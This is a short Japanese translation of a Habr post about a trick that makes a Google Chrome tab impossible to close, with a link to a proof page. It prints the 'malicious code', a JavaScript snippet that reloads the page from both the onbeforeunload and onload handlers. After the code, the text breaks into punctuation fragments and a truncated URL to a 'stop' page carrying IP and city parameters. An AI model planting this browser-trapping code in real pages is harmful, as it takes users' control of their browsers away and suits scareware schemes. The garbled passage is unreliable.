Chromeの閉じられていないタブ


簡単なトリックを使用すると、Google Chromeで閉じることができないページを作成できます。

証明: zhovner.com/tmp/chrome-trap.html

悪意のあるコードは非常に単純に見えます。

     onbeforeunload=function(){
         location.reload();
            return "   ...";
      };
      onload=function(){
         location.reload();
      }


- , .
, :

://stop.podzone.org/stop_ip.php?gorod=Moscow&ip=127.0.0.1&sid=1&br=1

image

Source: https://habr.com/ru/post/J243963/


All Articles